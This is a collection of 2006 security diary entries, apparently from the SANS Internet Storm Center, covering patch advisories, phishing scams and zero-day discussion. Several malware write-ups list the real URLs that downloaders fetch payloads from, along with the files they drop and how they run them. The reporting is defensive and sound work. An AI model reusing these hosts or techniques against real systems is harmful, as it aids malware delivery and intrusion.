Root-Level Exploit for OSX LaunchD Service
You can get more information about the vulnerability and exploit from Security Focus.
If you haven't already installed the update, time to get moving.
Thanks to Juha-Matti for the information.
OpenOffice.org Vulnerabilities
OpenOffice.org has additional security notes on their site that address the three specific issues:
- Java Applets
It is possible for some Java applets to break out of the secure "sandbox" in which they are normally constrained. The applet code could potentially have access to the entire system with whatever privileges the current user has.
A workaround is provided to temporarily disable support for Java applets. Instructions are provided for both 1.1.x and 2.0.x.
- Macros
A flaw with the macro mechanism could allow an attacker to include certain macros that would be executed even if the user has disabled document macros. Such macros could potentially have access to the entire system with whatever privileges the current user has.
There is no workaround for this issue
- File Format
A flaw in the parsing of the XML file formats allows for possible buffer overflows in specially malformed documents. The buffer overflow can crash the OpenOffice.org application and might be exploitable for arbitrary code-execution.
There is no workaround for this issue.
Thanks to Juha-Matti for the heads-up.
0 Comments
iTunes < 6.0.5 vulnerability & patch released
http://docs.info.apple.com
APPLE-SA-2006-06-29 iTunes 6.0.5
iTunes 6.0.5 is now available and, in addition to its other content,
fixes the following security issue:
CVE-ID: CVE-2006-1467
Available for: Mac OS X v10.2.8 or later, Windows XP / 2000
Impact: An integer overflow in iTunes could cause a denial of
service or lead to the execution of arbitrary code
Description: The AAC file parsing code in iTunes versions prior
to 6.0.5 contains an integer overflow vulnerability. Parsing a
maliciously-crafted AAC file could cause iTunes to terminate or
potentially execute arbitrary code. iTunes 6.0.5 addresses this
issue by improving the validation checks used when loading AAC
files. Credit to ATmaCA working with TippingPoint and the Zero Day
Initiative for reporting this issue.
0 Comments
Cisco Wireless Access Point Vulnerability Announced
Cisco has released a vulnerability disclosure for their Wireless Access Points:
http://www.cisco.com/warp
The vuln is in the web interface for the APs and could allow wiping of the security config and access to the administrative interface without authentication.
To quote Cisco:
A vulnerability exists in the access point web-browser interface when Security > Admin Access is changed from Default Authentication (Global Password) to Local User List Only (Individual Passwords). This results in the access point being re-configured with no security, either Global Password or Individual Passwords, enabled. This allows for open access to the access point via the web-browser interface or via the console port with no validation of user credentials.
The following access points are affected if running Cisco IOS® Software Release 12.3(8)JA or 12.3(8)JA1 and are configured for web-interface management:
-
350 Wireless Access Point and Wireless Bridge
-
1100 Wireless Access Point
-
1130 Wireless Access Point
-
1200 Wireless Access Point
-
1240 Wireless Access Point
-
1310 Wireless Bridge
- 1410 Wireless Access Point
0 Comments
Deja Vu - Advances in Rootkit malware
0 Comments
Always get permission - VA stolen laptop recovered
0 Comments
New version of OSX available
Apple announced yesterday that a new version of OSX (10.4.7) is available and recommended for all users:
http://www.apple.com/supporthttp://www.apple.com/support
To quote the announcement:
It includes fixes for:
- preventing AFP deadlocks and dropped connections
- saving Adobe and Quark documents to AFP mounted volumes
- Bluetooth file transfers, pairing and connecting to a Bluetooth mouse, and syncing to mobile phones
- audio playback in QuickTime, iTunes, Final Cut Pro, and Soundtrack Pro applications
- ensuring icons are spaced correctly when viewed on desktop
- determining the space required to burn folders
- iChat audio and video connectivity, creating chat rooms when using AIM
- importing files into Keynote 3
- PDF workflows when using iCal and iPhoto
- reliable use of Automator actions within workflows
- importing and removing fonts in Font Book
- syncing addresses, bookmarks, calendar events and files to .Mac
- compatibility with third party applications and devices
- previous standalone security updates
SHA1: MacOSXUpd10.4.7Intel.dmg = 2a25ed61d586b71ba7282fb896b2c910785ff358
SHA1: MacOSXUpd10.4.7PPC.dmg= 223d1fc9197a6a96c9d2f2a9110d37abc219c3a6
0 Comments
Two new Internet Explorer vulnerabilities disclosed including PoC
A critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) to trick a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site. The currently available version of PoC that was published is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon. The workaround for this appears to be disabling active scripting.
The second vulnerability is related to the handling of the object.documentElement.outerHTML property. The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user. This vulnerability can be potentially nasty as attackers can use it to retrieve data from other web sites user is logged into (for example, webmail) and harvest user credentials. Several handlers have spent a little more time validating this particular issue and while it is a subtle exploit and rated a lower level risk, this issue has raised some of our neck hairs.
Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.
Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla FireFox.
We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.
** As another worthy 'Handler tools' mention that is applicable as a general protection tool which has been gaining increased use in the testing of malicious code and reviewing potentially malicious websites is the SandboxIE tool. Browse safely over to http://www.sandboxie.com.
--
Bojan Zdrnja
William Salusky
0 Comments
Word macro trojan dropper and (another) downloader
We've seen a lot of new malware being spammed in last couple of hours.
First malware exploits an old vulnerability in Microsoft Word, MS01-034 (http://www.microsoft.com/technet/security/Bulletin/MS01-034.mspx). This vulnerability allows an attacker to execute embedded macros no matter what the user set his Microsoft Word to. Of course, as this is a pretty old vulnerability, only terribly outdated installations will be affected. If you are running any newer version of Microsoft Word, macro settings are on High by default so only macros signed by trusted sources are executed - all other macros are disabled. A user would have to change this setting to Medium (so they get asked) or Low in order to run this macro.The Word document comes in a ZIP file and, once executed, installs a Trojan. Detection on the Word document is pretty good at the moment.
The document pretends to list computer prices:
The other malware is a plain old (and boring?) downloader, but we've seen a large number of e-mails being spammed with it. The downloader uses typical social engineering to trick user into opening the archive. Besides the e-mail telling user there's a nice photo in the attachment, the executable name will be like DC0019.JPG__[lots of _]__JPG.exe.
The executable always seems to be in a ZIP archive, but sometimes it is encrypted (and in this case the password is in the e-mail body) and sometimes it's not.
Once executed, the downloader will install on the system and try to download two files:
http:// 206.204.52.54Â /img/util/logo_nav.jpg
which is a Symantec logo (more social engineering) and
http:// 218.239.223.224 /flash/menu.swf
this is a site in Korea and the last time we checked the file was not there.
AV detection is pretty low at the moment and only couple of AV products detected this: Symantec, NOD32, Norman, Trend Micro, Sophos. They either detect it as a downloader or generically (Bloodhound.W32.EP in Symantec's case).
0 Comments
New Mambo, Joomla releases fix security vulnerabilities
All version of Mambo prior to 4.6RC1 are vulnerable to a SQL injection attack in the weblinks.php file. You can patch this manually as only two variables need to be escaped, or you can download patches from the Mambo web site, http://www.mamboserver.com.
We've also received reports that some vulnerabilities in previous versions of Mambo (older than 4.5.3) are being actively exploited, so be sure that you are running the latest version, with the security patch installed. If we get more information about attacks we'll post an update.
New release of Joomla, 1.0.10 also fixes couple of security vulnerabilities. Joomla is also vulnerable to SQL injection attacks, of which 3 rated critical were fixed in the latest release. As the latest version fixes other security vulnerabilities and numerous bugs, users are urged to upgrade. You can find more information on the Joomla web site, http://www.joomla.org.
0 Comments
Reminder about MS06-025
The original patch from Microsoft caused issues with dialup. A new patch was released June 21 (or thereabouts) that addressed this issue. Exploit code is available that leverages this issue. This allows an authenticated attacker to execute arbitrary code on Windows 2000 and XP SP2 systems. Previous versions allow unauthenticated attackers to execute arbitrary code, this you garden-variety "bad-thing(tm)."
0 Comments
Excel Issue Scorecard
CVE-2006-3059 aka "Excel Repair Mode" http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B
CVE-2006-3086 aka "Long Hyperlink" http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples
CVE-2006-3014 aka "Shockwave vulnerability"
Exploited by proof of concept code Flemex.A
The workaround is a killbit
0 Comments
Field Day Exercise
Over this weekend, ham radio operators (who aren't at the World Cup) are participating in an annual emergency communications preparations exercise known as Field Day (http://en.wikipedia.org/wiki/Field_day). It emphasizes the use of emergency and alternative power sources. In the spirit of this exercise I'm running on backup power today to determine how long my setup will last and work out the bugs.
It has not been going smoothly today, but that's the point of the exercise I suppose.
How long can your critical systems operate without grid power?
0 Comments
Sudo For Windows
0 Comments
Malware propagation information from microsoft.
Microsoft recently released a report on the statistics they are collecting via MSRT.
There is a nice executive summary but please read beyond that. One security trade publication clearly misread the summary and posted a misquote (62% of computers infected with backdoor). That is not what the report states. The 62% number is the percentage of machines that had malware removed from them by MSRT AND had a backdoor installed on them. Restated more then ½ of the machines where an infection was detected and removed also had remote control backdoors on them. No surprise there really. Although there are ways for the hackers to use a system without a backdoor tool installed for the most part the hackers want to be able to remotely upgrade and control systems they have compromised.
The actual report comes from the Rapid Response Team Waggener Edstrom Worldwide.
Overall the report is very good. There are lots of nice charts and graphs. The author did a good job normalizing statistics but also provided the unnormalized view. They don't really mention false negatives until nearly the end of the document. I do not completely agree with their malware categories however since those are well defined up front I had no problem understanding what they meant by email worm, p2p worm, im worm exploit worm, backdoor Trojan, rootkit or virus. They also claim that MSRT is part of a defense in depth even when you have another antivirus package installed. Due to its lack of realtime protection I would say its not defense at all. Its reactive and only comes into play after the fact of infection. Since it is also fairly limited in the malware it detects and the signatures are usually only updated once a month I don't know of any current antivirus package that would miss a virus that MSRT would detect. So I do not agree this provides defense in depth. I do however see serious benifit to running MSRT. It certainally has contributed to the effort of getting infected systems cleaned.
Some other fun facts I gleaned from this report:
MSRT only removes live malware or malware that will be autorun during a reboot.
1 computer in 355 had malware that was recognized and removed.
5% of the root kits removed were WinNT/F4IRootkit (aka the sony root kit) with about 420k removals from 250k machines.
35% of the computer infected were infected via the end user clicking or opening something.
20% of the computers cleaned had been infected sometime in the past.
So if you have a little time and you are interested in malware propagation I recommend reading this report.
0 Comments
isc.org provides attack mitigation
Some services respond to potentially spoofed udp packets.
MITIGATION:
Upgrade to bind 9.3.3b1.
Disable or restrict access to UDP services that don't need to be open to the internet.
The basic issue here is very old. It was originally reported in 1999. The CVE number for it is CVE-1999-0103. http://nvd.nist.gov/nvd.cfm?cvename=CVE-1999-0103
"Echo and chargen, or other combinations of UDP services, can be used in tandem to flood the server, a.k.a. UDP bomb or UDP packet storm."
If you consider DNS to be one side of an "other combination" of UDP services this is not new. What is new is that this version of bind will not send FORMERR packets if the original packet came from the set of well known UDP ports listed above. ISC.ORG has added some code to mitigate attacks with well known spoofed source ports. I do not know of any other DNS software vendor that has added this capability.
7 years ago CERT and others warned us not to leave things like echo and chargen open.
However some OSes and network equipment vendors still ship products with those types of services enabled by default and open to the world. Those services haven't not been in common usage since the 1990's.
--- 9.3.3b1 released ---
<SNIP>
1951. [security] Drop queries from particular well known ports.
<SNIP>
0 Comments
Top 100 security tools
You can find the list at http://SecTools.Org
From that link
`I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also will be pointing newbies to this site whenever they write me saying "I don't know where to start".
Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also means that the list is slightly biased toward "attack" tools rather than defensive ones.'
0 Comments
Opera 9 long href PoC
0 Comments
Yahoo! Login Server Problems
ISC Handlers
0 Comments
Opera 9.0 released
http://www.opera.com/index.dml
0 Comments
New Bagle in Encrypted Zip File Attachments
0 Comments
Comments on 0day
The first question I pose is: why the sudden increase in vulnerabilities that are published as 0day instead of responsibly disclosed? This isn't intended to be a comment on full-disclosure. But if you look over the past couple of years, almost all vulnerabilities that are discovered by actual researchers (not criminals) were disclosed responsibly to Microsoft. Is the researching community becoming disenchanted with the long Microsoft patch cycle? Is there more incentive (fame) for researchers to disclose full details to bugtraq or full-disclosure? Is there more incentive (financial) to sell an exploit to iDefense, 3com, or the highest bidder on eBay? If you are a software vendor, what are you doing to ensure that vulnerability researchers are kept happy and disclosing security bugs responsibly?
Now here is where I can feel people firing up their flamethrowers. There has been lots of panic and rumors recently about 0day bugs. And it isn't just focused on Microsoft products. We occassionally get e-mail asking if we know about 0day in OpenSSH, Apache, and PHP. The question shouldn't be whether 0day exists. Because 0day exists and it will always exist.
The question is whether you or your organization would be the target of such an exploit? The time is long gone for an exploit author to embed his nice 0day into a worm and let it run rampant through the Internet. Today, 0day exploits are more likely to be used for military purposes, financial crime, and possibly terrorist activities (although, probably not).
So in reality, the organizations that really need to be concerned about 0day are the ones responsible for protecting military/government assets, financial institutions, and critical infrastructure agencies. Since you know 0day exists and if you are a target, what are you doing to protect yourself? How do you protect against, detect, and respond to unknown vulnerabilities?
For the rest of the folks out there (small/medium businesses, hobbyists)... Should you worry about 0day? Usually not, but if you have all the other critical security components in place then go ahead.
I'm curious to know what kinds of 0day protection systems people have in place? In the *NIX world, there are some fairly decent (and free) options for protection: Grsecurity, NSA SE Linux, Systrace, LIDS, ProPolice GCC patch and others. How about the Windows side? There doesn't seem to be much for the folks without hardcore $$. CORE security has something new called Force (http://force.coresecurity.com/) that looks quite promising. There is also a good list of commercial products for Windows and some comments compiled by fellow handler Jason Lam here: http://isc.sans.org/diary.php?storyid=635
In summary, you should expect 0day to be alive and well for your favorite operating systems, daemons, and applications. And if it concerns you, then do something about it instead of waiting to get smacked with it later. You will sleep better at night and not be frustrated at your favorite software vendor when they take 6+ months to patch simple little vulnerabilities.
0 Comments
New Excel 0day (Are we evolving or going in circles?)
Today there is news of another 0day vulnerability in Microsoft Office. You can check your favorite vulnerability notification service for all the gory details. Someone wrote asking for comments and honestly I don't have any step-by-step instructions for defending against this specific threat. All of the general high-level recommendations from the MS Word 0day a couple of weeks ago still apply. Perhaps we will have something more detailed later when the details are more clear.
Instead, here are some thoughts about the current state of vulnerability discoveries. If you have followed along with the industry in the last couple of years, you have probably noticed that remote root/administrator type of bugs have slowly disappeared and now seem to be fairly rare. Most vulnerability researchers that are publishing advisories now seem to focus on web applications and clients (web browsers, Office, etc). I am honestly expecting to see a healthy stream of client vulnerabilities in Office applications over the next 2-3 years. Several years ago, nobody cared too much about exploitable bugs in client side applications because remote bugs were still readily available. Of course, given the recent media attention about the MS Word 0day exploit, alot of vulnerability researchers are now hitting Word with every available fuzzer that they have.
So now we have a scenario where there will be a good number of 0day vulnerabilities discovered in client-side applications like MS Office and OpenOffice. Users will be advised not to open documents from unknown persons. So have we evolved? Or have we just jumped back in time ten years when every aspiring script kiddie was writing VBA Macro viruses?
Keep reading for another article about 0day...
0 Comments
The dangers of shared web hosts
Space on a shared server is ok for personal use. But you should think twice before using it for commercial, in particular business critical use. Your web sites security will depend on a few hundred other users on the same system doing the right thing. A bad php script on one virtual server could lead to a compromisse of all web sites hosted on the same system.
If you have to use a virtual host, try to follow these tips to make things "as secure as possible":
- Don't go with the lowest bidder. You still rely on the hosting company to maintain the server and there is not much maintenance that can be done for $1/month.
- Check references. Look at sites like zone-h.org for defacement history and netcraft.com for stats like uptime.
- Keep solid backups of your files on a local system!
- Avoid files and directories that are writeable by anybody but yourself. In particular, avoid files writable by the web server.
- Do not rely on any access control provided by php/perl/cgi scripts. Other users may bypass it with their own scripts.
- know your customers. Avoid handing out accounts before billing details are validated. Try to verify credit card payments by phone.
- consider virtual systems (xen, vmware...). While not perfect, its a lot better then housing all users on the same system.
- chrooted user accounts can be almost as good as virtual hosts. But they can be hard to maintain, and they still use the same web server process which may cross over chrooted users.
- monitor user activity carefully.
- use a host based IDS to detect intrusions quickly.
- got backups?
0 Comments
Rumors about IIS 6.0 issues
Update: All feedback we received so far points to the microsoft.fr being an isolated issue.
Some persistant rumors talk about a possible new exploit (0-day?) against IIS 6.0. The defacement of experts.microsoft.fr is used as evidence. At this point, we have nothing to support that claim. If you have any additional evidence, please let us know . An image of the alledged defacement can be found at flikr: http://www.flickr.com/photos/affandesign/169734004/in/photostream/. Also see http://www.zone-h.org/content/view/4767/31/ for a mirror of the defacement.
0 Comments
Empty emails?
There is some speculation it may be malware related, as in a poorly written piece of code spewing out empty emails. One other theory involves confirming known good addresses to seed a new piece of malware or spam. Is this related to Yamanner (sp?)?
Cheers,
Adrien
0 Comments
Excel new vuln FAQ
Update: A perl script was published on Milw0rm, which appears to exploit *some* Excel vulnerability. It creates a spreadsheet inclusing a very long URL. Once the user click on the URL, Excel will crash. As our reader Dominic pointed out, the script does not claim to be the 0day under discussion. Virustotal does not trigger any signatures based on the Excel file generated by the exploit.
Juha-Matti, a regular ISC contributor has written up some information into a FAQ. This is with regards to a recently discovered previously unknown vulnerability in Microsoft Excel. Gotten tired of the phrase '0day'? I sure have.
http://blogs.securiteam.com/?p=451
Although I do not entirely agree with all of his advice, I think that the first and only defense is - defense in depth.
Do NOT rely solely on antivirus.
Do NOT rely solely on filtering by extension.
Do NOT open Excel files that appear unsolicited in your mailbox.
No single tool or measure is sufficient.
I am hoping that the point is getting accross, do not rely on traditional defensive measures, it is quite likely they will prove inadequate against a custom made targeted trojan built just to penetrate your infrastructure. Particularly using an undisclosed vulnerability. No signature based tool can help you in this case.
Cheers,
Adrien
(Maddison's Baba)
0 Comments
Update on the Paypal Phish Phlaw
PayPal fixes phishing hole
Thanks to one of our readers for supplying us with the information.
0 Comments
Happy Father's Day
So to my fellow Handler "guys" I say Happy Father's Day to some of the best dad's I know. To my own dad who will celebrate 72 years next week I say thanks for all you do. To all of you I say Happy Father's Day.
0 Comments
Known Issues for the MS06-025
Microsoft Security Response Blog
Thanks to Juha-Matti for calling this to our attention.
0 Comments
Phishes, Phlaws and Phurther Network Phollies
We've recieved a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users.
The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.
When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page.
Logging in sends the PayPal username and password to the bad guys and causes another page asking for more information (social security number, credit card number ...) to remove the limits on the access of thier account.
More to come as we confirm information.
FDIC Phish
Juha-Matti dropped us a link to a newly added US-Cert Advisory detailing a scam targeting customers of FDIC insured institutions.
0 Comments
Adobe Reader Update
Details can be found on Adobe Support Knowledgebase article 327817
0 Comments
Reports of Excel 0-Day
In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.
Update - We've recieved reports (Thanks Juha-Matti) that Symantec is detecting this attack.
Trojan.Mdropper.J is the detection for the malicious .xls which uses the 0-day exploit to drop Downloader.Booli.A.
The Symantec website also reports ..
Downloader.Booli.A may arrive on the compromised computer, dropped by Trojan.Mdropper.J, with the following name:
%System%\svc.exe
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
When Downloader.Booli.A is executed, it performs the following actions:
- Attempts to run Internet Explorer and inject its code into Internet Explorer to potentially bypass firewalls.
- Attempts to download a file from the following location:
[http://]210.6.90.153:7890/svcho[REMOVED]
Note: At the time of writing the remote file was not available. - Saves the file as the following and if the download was successful, executes the file:
c:\temp.exe - Creates an empty file before exiting:
c:\bool.ini
We'll pass on more information as we receive it.
-Chris
0 Comments
Potential Patch Problem with MS06-025
not able to dial up after applying MS06-025 (KB911280).
I verified this on a test machine and it looks like it breaks dial up.
We have some scripts that need to be run in order to authenticate the user
properly after the dial up connection is established.
It looks like the patch prevents scripts from running at all. Even when I
turned on the terminal window (in interactive logon and scripting) I can't
log in manually at all. After the connection is established I can see the
Username prompt in the terminal window but I can't enter any data.
Uninstalling the patch fixes this."
UPDATE: The case number and guidance we received from Microsoft has been changed. Sorry for the initial confusion that some of you may have faced trying to use this case number. Here is the updated guidance from Microsoft that we have been given. They want each customer to open their own case. You need to mention MS06-025 breaking dial up and your case will be created and then added to the master case. The number to use to contact Microsoft for free support, for issues such as these, remains the same: 1-(866) PC-SAFETY.
0 Comments
Sendmail Multi-Part MIME Message Handling Denial of Service vulnarability
The new Sendmail vulnerability reported and is cause due to an error in the termination of the recursive "mime8to7()" function when performing MIME conversions. It can be exploited to cause a certain sendmail process to crash when it runs out of stack space while processing a deeply nested malformed MIME message. It can be exploited by malicious people to cause a DoS (Denial of Service). You can apply patch or upgrade to 8.13.7 version.
Affected Version : 8.13.6 and prior.
The additional vulnerability information can be found following sites.
http://www.sendmail.org/releases/8.13.7.html
http://www.kb.cert.org/vuls/id/146718
0 Comments
E-mails with malicious links targeting Australia
All e-mails we've received have the same content, but the URL seems to be moving around. The body is pasted below:
"People starting panic withdrawals, some of the accounts were reported closed due to technical reasons, many ATMs are not operating. Does it seem that one of the Australia's greatest goes bankrupt? The full story could be found here: <URL>
Well, hope that isn't true... Anyway You'd rather check your balance..."
The URL contains an obfuscated JavaScript. The JavaScript code will check which browser the user is running and will redirect him to the appropriate exploit, served by a CGI script.
The JavaScript will also detect if a user is running Service Pack 2, and append that information as a CGI parameter as well.
The following Internet Explorer vulnerabilities are exploited:
MS03-011
MS06-006
MS06-014
And one Mozilla FireFox vulnerability is exploited as well:
MFSA2005-50
For FireFox user, there is good add-on tool for preventing malicious Javascripts. The add-on tool called "NoScript". You can find more information following site :
https://addons.mozilla.org/firefox/722/
0 Comments
Webcast archive available
https://www.sans.org/webcasts/show.php?webcastid=90622
0 Comments
Exploits for most recent Microsoft Patches
Here a quick lists of what we have seen so far:
MS06-024: Windows Media Player.
MS06-030: SMB Priviledge Escalation.
Thanks to Juha-Matti for finding the exploits!
0 Comments
MS06-029: Script injection through Exchange/OWA
Affected Software:
- Microsoft Exchange 2000 Server Pack 3 with the August 2004 Exchange 2000 Server Post-Service Pack 3 Update Rollup
- Microsoft Exchange Server 2003 Service Pack 1
- Microsoft Exchange Server 2003 Service Pack 2
Severity: Important
Description: Microsoft Exchange servers running Outlook Web Access (OWA) to allow clients to remotely check emails are placing their clients at risk to a script injection vulnerability. A specially crafted email sent to the user and opened with OWA would allow the script to run. According to Microsoft "A script injection vulnerability exists that could allow an attacker to run a malicious script. If this malicious script is run, it would run in the security context of the user on the client." If you are running Microsoft Exchange OWA service, it is very important that you patch ASAP.
If you have been tracking the issue with Yahoo web mail, this should sound very familiar.
The vulnerability is covered in CVE-2006-1193.
--
Lorna Hutcheson
0 Comments
MS06-031: RPC Mutual Authentication Vulnerability
This looks to be an obscure bug that only affects Windows 2000. In
reality, the conditions for exploitation seem rare and no code execution
is possible. The bug only affects custom RPC applications using SSL
with mutual authentication, which probably doesn't amount to many
applications out there. Finally, the impact of this bug only
allows the attacker to impersonate a trusted RPC server - it doesn't
allow code execution.
For all the overworked sysadmins, you can probably leave this at the
bottom of your patch list.
this vulnerability is also covered in CVE-2006-2380.
--
Kyle Haugsness
0 Comments
MS06-030: Microsoft SMB Vulnerabilities
MS06-030 covers two vulnerabilities. The more severe one ("SMB Driver Elevation of Privilege Vulnerability") will allow an attacker who has regular user access to a system to gain administrator access. The attack requires some form of regular access, for example valid login credentials or an exploit against a regular user on the system.
You could disable the Workstation service to mitigate this vulnerability. However, this is probably only going to work for stand alone workstations. Disabling the Workstation service will break file and printer sharing.
The second vulnerability ("SMB Invalid Handle Vulnerability") results in a Denial of Service condition, but as the first vulnerability it requires valid login credentials.
This vulnerability is covered in CVE-2006-2373.
--
Johannes Ullrich
0 Comments
Barracuda Networks outage statement
"Outage on 6/13/2006 for Barracuda Spam Firewall Customers
Barracuda Networks remains committed to open communications with our customer base. This morning, we had an outage that affected a large number of Barracuda Spam Firewall customers. The affected customers were Barracuda Spam Firewall customers employing the virus scan feature of the Barracuda Spam Firewall using virus definition 1.5.144. The outage resolved itself with a subsequent Energize Update to virus definition 1.5.145.
Details:
Beginning at 4:53 AM PST today, a faulty virus definition was released that had an incomplete virus database (virus definition 1.5.144). To protect our customers in the event such a circumstance occurred, the Barracuda Spam Firewall has a built in precautionary feature which automatically prevents email from being sent through in order to keep potentially infected emails from being delivered. Any Barracuda Spam Firewall in the field that had received virus definition 1.5.144 immediately began to queue all incoming messages until the complete virus database became available.
At 7:02 AM PST, the majority of Barracuda Spam Firewalls automatically received virus definition 1.5.145 containing the complete virus database, and email began to process normally for those customers previously affected.
The cause of the incomplete virus definition has been identified and resolved, and additional measures have been put in place to prevent this issue from occuring in the future.
Due to the volume of calls to our Technical Support department during this period, we did experience a phone system malfunction which caused many customers to have to wait for longer periods of time than what they have come to expect. We apologize for any delay or inconvenience this may have caused and feel confident that our support department is back online and ready to assist customers right away.
Thank you for your patience. We look forward to continuing to provide all our customers with the same high quality service and support that they have come to rely on.
Sincerely,
Barracuda Networks Support and Operations Teams"
0 Comments
MS06-032: Source routing buffer overflow
While Microsoft rates this as important only, we at the Internet Storm Center feel that it is very critical. It is easy to exploit this. One (spoofed) packet could allow an attacker to "own" a vulnerable system. The TCP/IP stack is vulnerable to a buffer overflow in the handling of source routed packets.
While some firewalls might protect from this, consider systems that are used on the road such as in airport, hotels, ... so they must be protected now.
Workarounds:
- Block packets with source routing options in the firewall. According to Microsoft "IP source route options 131 and 137" are the dangerous ones, but why would you allow source routing through your firewall anyway?
- Personal firewall might help as well
- Disable source routing in windows by setting a registry key (see the Microsoft bulletin for details) [highly recommended action, even if you patched already]
--
Swa Frantzen -- section 66
0 Comments
MS06-025: RRAS arbitrary code execution
A CRITICAL vulnerability in Microsoft's Routing and Remote Access Services (RRAS). A successful exploit could allow an attacker to execute arbitrary code. In order to exploit the vulnerability remotely, an
attacker has to be able to log in to a system first.
The RRAS is used to connect to Microsoft networks remotely via dial up modems. With RRAS, a user can dial up to a remote network (e.g. corporate network) and access all services on the remote network like
connected locally. In addition, RRAS is used for various multi-protocol LAN/WAN connections via VPNs.
It is not clear how exactly the exploit would occur over a network, or what the traffic will look like. We will update this diary later once we figured it out. According to this list, RRAS uses port 1701/UDP (L2TP), 1723/TCP (PPTP), as well as protocols 47 (GRE), 51 (AH) and 50 (ESP). In particular the protocols other then TCP/UDP may not be blocked by all firewalls.
For most users, the best option is to disable the service. See the bulletin on how to do this. Double check that you disabled all guest accounts or other accounts that allow connections with no or weak passwords.
--
Johannes Ullrich
0 Comments
MS06-011 Updated
This update was originally released in March. Our analysis at the time is located here.
The bulletin was re-released today with a number of tweaks. "This update has been revised to include updated registry key values for the NetBT, RemoteAccess, and TCPIP services. These values have been modified to be the same as Windows XP Service Pack 2 on Windows XP Service Pack 1 systems, and the same as Windows 2003 Service Pack 1 on Windows 2003 systems with no service pack applied. Customers are encouraged to apply this revised update for additional security from privilege elevation through the these services as described in the Vulnerability Details section of this security bulletin."
Scott Fendley - Univ of Arkansas
0 Comments
MS06-028: PowerPoint malformed record / Remote Code Execution
Vulnerable: Office 2000, XP, 2003 for Windows and Office v.X and Office 2004 for Mac (yes, this vulnerability is present on Mac systems)
This vulnerability affects PowerPoint documents and allows for remote code execution with the privileges of the logged in user. A malicious PowerPoint document with a malformed record can corrupt system memory and be used to execute code. This patch replaces MS06-010 for PowerPoint 2000.
An attacker would have to somehow convince a victim to open a malicious PowerPoint file to exploit this vulnerability (either by e-mail or web download, for instance). If the user is logged in as administrator, an attacker would gain full control of the system. Presumably, different malicious PowerPoint files would have to be created to exploit Windows and Mac (i.e. the same PowerPoint file would likely not be able to exploit both operating systems).
This patch is classified critical for PowerPoint 2000 only, and important for all other versions (including Mac). This patch fixes the vulnerability detailed in CVE-2006-0022. Users are advised to apply this patch if they use Microsoft PowerPoint.
John Bambenek -- University of Illinois
0 Comments
MS06-024: buffer overflow in windows media player
Windows Media player is vulnerable in it's handling of PNG images.
Microsoft rates his vulnerability as critical. It allows remote code execution.
Attack vectors of both email and web are possible through the use of .wmz files.
Workarounds will be based on content filetring in gateways, but might be below par on effectiveness if you count encrypted messages and the like as possible exploit vectors.
--
Swa Frantzen -- section 66
0 Comments
MS06-027: MS Word object pointer / Remote Code Execution
Vulnerable: Word 2000 (including Word Viewer 2003) and better and Works 2000 and better
Not Vulnerable: Word for Mac
This is a remote code execution vulnerability that uses a malformed object pointer to corrupt system memory and can be used to execute arbitrary code. If the user logged in has administrative privileges, the exploit will run with those same privileges and could take complete system control.
In order to successfully exploit this vulnerability, an attacker would have to persuade a user to open a malicious Word document, either through e-mail or a web page. This vulnerability is marked critical and Microsoft Office users should apply the patch immediately.
It is possible to not log in with an administrator-level account, but that would not prevent "spyware" classes of attacks.
--
John Bambenek -- University of Illinois
0 Comments
Microsoft patch day
- MS06-021 Cumulative patch for Internet Explorer - Critical
- MS06-022 ART image library buffer overflow - Critical
- MS06-023 Microsoft JScript memory corruption - Critical
- MS06-024 Windows media player - Critical
- MS06-025 RRAS - Critical
- MS06-026 Graphics rendering engine remote code execution - Critical
- MS06-027 Word remote code execution - Critical
- MS06-028 Powerpoint remote code execution -Critical
- MS06-029 Exchange - Important
- MS06-030 SMB privilege escalation - Important
- MS06-031 RPC mutual authentication spoofing - Moderate
- MS06-032 IP source routing allows remote code execution - Important
Handlers actively working on these include Arrigo, John, Kyle, Lorna, Johannes, Scott and Swa.
0 Comments
MS06-026: Graphics Rendering Engine / Remote Code Execution
** This vulnerability ONLY applies to Windows 98, 98SE, and ME (We aren't still running these, are we?). Windows 2000, XP and beyond are not vulnerable **
This is a critical vulnerability in the Graphics Rednering Engine that allows remote code execution of the target system using specifically crafted WMF files. When successfully exploited, the target system can be completely compromised. This is a new vulnerability not associated with the WMF vulnerabilities from earlier this year. An attacker can exploit this vulnerability by using a specifically crafted webpage (and getting the victim to view that page) or by sending an exploit in email (where the email reader renders images).
If you are running Windows 98, 98SE, or ME, you should upgrade your operating system to Windows 2000, XP or later. If you cannot upgrade, this patch should be installed immediately.
